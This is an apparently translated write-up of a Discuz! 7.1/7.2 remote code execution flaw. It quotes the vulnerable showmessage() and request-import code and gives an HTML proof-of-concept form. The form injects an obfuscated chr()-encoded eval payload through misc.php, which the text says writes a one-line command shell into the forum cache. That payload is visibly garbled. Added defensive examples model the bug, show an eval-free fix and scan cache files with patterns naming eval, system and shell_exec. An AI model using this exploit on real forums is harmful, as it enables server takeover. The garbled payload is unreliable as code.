Discuz! 7.1 & 7.2 Remote Code Execution vulnerability

Source: Internet
Author: User
Tags: chr, vars

Affected Products:
Discuz! 7.1 & 7.2
Vulnerability Description:
The $scriptlang array involved in the vulnerability is only initialized after a plug-in has been installed. In Discuz! 7.1 and 7.2 the parameter that showmessage() executes through eval is otherwise uninitialized and can be submitted arbitrarily, so arbitrary PHP code can be executed. The analysis of this remote code execution vulnerability follows; the problem is really serious, as a shell can be written directly.

First, the vulnerability comes from the showmessage() function:

```php
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
	extract($GLOBALS, EXTR_SKIP); // dangerous usage: uninitialized variables are brought straight into the function, which directly causes the problem (from www.oldjun.com)
	global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
	define('CACHE_FORBIDDEN', TRUE);

	$hookscriptmessage = $show_message = $message;

	$messagehandle = 0;
	$msgforward = unserialize($_DCACHE['settings']['msgforward']);
	$refreshtime = intval($msgforward['refreshtime']);
	$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
	$msgforward['refreshtime'] = $refreshtime * 1000;
	$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
	$seccodecheck = $seccodestatus & 2;

	if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
		$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
		if($fp = @fopen($statlogfile, 'a')) {
			@flock($fp, 2);
			if(is_array($funcstatinfo)) {
				$funcstatinfo = array_unique($funcstatinfo);
				foreach($funcstatinfo as $funcinfo) {
					fwrite($fp, funcstat_query($funcinfo, $message)."\n");
				}
			} else {
				fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
			}
			fclose($fp);
			$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
		}
	}

	if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
		write_statlog($message);
	}

	if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
		updatesession();
		dheader("Location: ".str_replace('&amp;', '&', $url_forward));
	}

	if(!empty($infloat)) {
		if($extra) {
			$messagehandle = $extra;
		}
		$extra = '';
	}

	if(in_array($extra, array('halted', 'noperm'))) {
		$discuz_action = 254;
	} else {
		$discuz_action = 255;
	}

	include language('messages');

	$vars = explode(':', $message); // as long as the message contains ':' this branch is reachable
	if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) { // the two parts split by ':' are used as array indexes
		eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";"); // $scriptlang is uninitialized, so it can be supplied by the client (from www.oldjun.com)
	} elseif(isset($language[$message])) {
		$pre = $inajax ? 'ajax_' : '';
		eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
		unset($pre);
	}
	......
}
```

Second, the global mechanism of DZ allows uninitialized parameters to be submitted arbitrarily:

```php
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
	foreach($$_request as $_key => $_value) {
		$_key{0} != '_' && $$_key = daddslashes($_value);
	}
}
```

Third, misc.php happens to have a spot where the message can be customized, but it too is uninitialized:

```php
} elseif($action == 'imme_binding' && $discuz_uid) {
	if(isemail($id)) {
		$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
		$msn = explode("\t", $msn);
		$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
		$msn = "$msn[0]\t$id";
		$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
		showmessage('msn_binding_succeed', 'memcp.php');
	} else {
		if($result == 'declined') {
			dheader("Location: memcp.php");
		} else {
			showmessage($response['result']); // $response is not initialized and can be supplied by the client (from www.oldjun.com)
		}
	}
}
```
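The following is an added example, not Discuz! code, that models the two ingredients of the bug (the request-to-variable import loop and the eval on an uninitialized $scriptlang) against a constructed POST body, and then shows a hardened lookup. The statement the original showmessage() would hand to eval() is only returned as a string here, never executed; the function names, the $scope array standing in for the global symbol table, and the hardened variant are assumptions for illustration, not Discuz!'s own patch.

```php
<?php
// Added example, not Discuz! code: models the two ingredients of the bug with a
// constructed request, then shows a hardened lookup. The statement that the original
// showmessage() would hand to eval() is only returned as a string here, never executed.

// Discuz!-style register_globals emulation (the "global mechanism" above): every
// request key whose name does not start with '_' becomes a variable. $scope stands
// in for the global symbol table; $key[0] replaces the pre-PHP-8 $key{0} syntax.
function import_request_globals(array $request, array &$scope)
{
    foreach ($request as $key => $value) {
        if (is_string($key) && $key !== '' && $key[0] !== '_') {
            // no whitelist: internal names such as scriptlang or response are accepted
            $scope[$key] = $value;
        }
    }
}

// Mirrors the vulnerable path: extract($GLOBALS, EXTR_SKIP) makes $scriptlang
// visible inside the function although the application never initialized it.
// Returns the PHP statement the original builds for eval(), or null if no branch matches.
function showmessage_vulnerable(array $scope, $message)
{
    $scriptlang = isset($scope['scriptlang']) ? $scope['scriptlang'] : null;
    $vars = explode(':', $message);
    if (count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {
        return '$show_message = "' . str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]]) . '";';
    }
    return null;
}

// Hardened variant (an assumption for illustration, not Discuz!'s own patch): the
// message key is resolved only against a table the application loaded itself,
// request-derived variables are never consulted, and placeholders are filled with
// strtr() instead of eval(), so message text can never be interpreted as code.
function showmessage_hardened(array $languageTable, $message, array $placeholders = array())
{
    if (!isset($languageTable[$message])) {
        return null;
    }
    $map = array();
    foreach ($placeholders as $name => $value) {
        $map['{' . $name . '}'] = htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
    }
    return strtr($languageTable[$message], $map);
}

// --- constructed demonstration ---
$post = array(                                  // constructed POST body, shaped like the PoC form
    'action'     => 'imme_binding',
    'response'   => array('result' => '1:2'),
    'scriptlang' => array('1' => array('2' => 'INJECTED')),
);
$scope = array();
import_request_globals($post, $scope);

// the client chose both the message ('1:2') and the text that ends up inside eval()
echo "vulnerable path would eval: " . showmessage_vulnerable($scope, $scope['response']['result']) . "\n";

// the hardened lookup ignores both: the only keys it knows come from the language table
$language = array('msn_binding_succeed' => 'MSN account {id} bound.');
echo "hardened: " . showmessage_hardened($language, 'msn_binding_succeed', array('id' => 'alice')) . "\n";
echo "hardened: " . var_export(showmessage_hardened($language, $scope['response']['result']), true) . "\n";
```

Run it with `php example.php`. The design point of the hardened variant is that neither fix on its own is sufficient: initializing $scriptlang before use closes this specific path, but as long as message text is interpolated through eval, any other way of influencing that text reopens it, so the template substitution replaces eval entirely.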
Test method: the programs (methods) provided by this site may be offensive and are for security research and teaching purposes only; use at your own risk!
    1. In the showmessage() function, $vars = explode(':', $message), and the message is controllable by the client, so it is easy: the two parts become the indexes of a custom array.
    2. The HTML test code:

```html
<form method="POST" action="http://bbs.xxxx.com/misc.php" enctype="multipart/form-data">
Post ID, specify an existing post: <input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval (Chr (102). Chr. chr ( 117). Chr (() Chr (102). CHR (111). chr (102) CHR (101). Chr (a) Chr (+). Chr (a 111). Chr (A.). Chr (117). CHR (109). chr (the "CHR"). Chr (the "CHR"). Chr (the "CHR"). Chr (the "the"). Chr (104). CHR (101) . chr. chr (117). CHR (101). Chr (103). CHR (111). CHR (117). chr (the. chr). Chr (for the (), Chr (.) ( (a). Chr (104) Chr (() CHR). chr (the "CHR"). Chr. chr (119). Chr (The) Chr. Chr. Chr (a) (a) (+ 60). ). Chr. chr (104). CHR (101). Chr (118). Chr (() Chr (108). Chr (a) Chr (a). Chr (80). Chr (+) (+) ). chr (CHR). Chr. chr (109). chr (the "CHR"). Chr (the "()") Chr. Chr (the "()). Chr (the" CHR ") (the 41). CHR)}}" />
<input type="submit" name="topicsubmit" value="Commit" class="submit" />
</form>
```

    3. A one-line shell (cmd) is generated in forumdata/cache/usergroup_01.php.
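As an added example that is not part of the original write-up, the script below is a post-incident check for the outcome described in step 3: a PHP file under forumdata/cache/ that contains executable code instead of the data assignments the forum writes there. The directory layout, the sample files and the detection patterns are constructed for this example and are heuristics, not a statement of Discuz!'s cache file format.

```php
<?php
// Added example, not Discuz! code: a post-incident check for the outcome described
// above, a PHP file under forumdata/cache/ that contains executable code instead of
// the data assignments the forum writes there. The patterns are heuristics chosen for
// this example, not a statement of Discuz!'s cache file format.

function suspicious_cache_files($dir)
{
    $patterns = array(
        '/\$_(POST|GET|REQUEST|COOKIE)\b/',                                   // reads client input
        '/\b(eval|assert|system|passthru|shell_exec|popen|proc_open)\s*\(/i',   // executes it
        '/\bbase64_decode\s*\(/i',                                              // common obfuscation
    );
    $hits = array();
    $files = glob(rtrim($dir, '/') . '/*.php');
    if ($files === false) {
        $files = array();
    }
    foreach ($files as $file) {
        $src = file_get_contents($file);
        foreach ($patterns as $re) {
            if (preg_match($re, $src, $m)) {
                $hits[basename($file)] = $m[0];   // first matching token is enough to flag the file
                break;
            }
        }
    }
    ksort($hits);
    return $hits;
}

// --- constructed demonstration in a temporary directory ---
$tmp = sys_get_temp_dir() . '/cache_scan_' . uniqid();
mkdir($tmp);
// legitimate-looking cache file: a data assignment only (constructed sample)
file_put_contents($tmp . '/settings.php', "<?php\n\$_DCACHE['settings'] = array('bbname' => 'demo');\n");
// planted file that takes a command from the request (constructed sample; the body is a marker, not a working shell)
file_put_contents($tmp . '/usergroup_01.php', "<?php\n\$cmd = \$_POST['cmd'];\n");

foreach (suspicious_cache_files($tmp) as $name => $token) {
    echo "suspicious: $name (matched '$token')\n";
}

// clean up the constructed files
array_map('unlink', glob($tmp . '/*.php'));
rmdir($tmp);
```

Point `suspicious_cache_files()` at the real cache directory of a forum under review instead of the temporary one; a clean directory returns an empty array. Comparing file modification times against the last legitimate cache rebuild is a useful second signal that this example does not implement.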
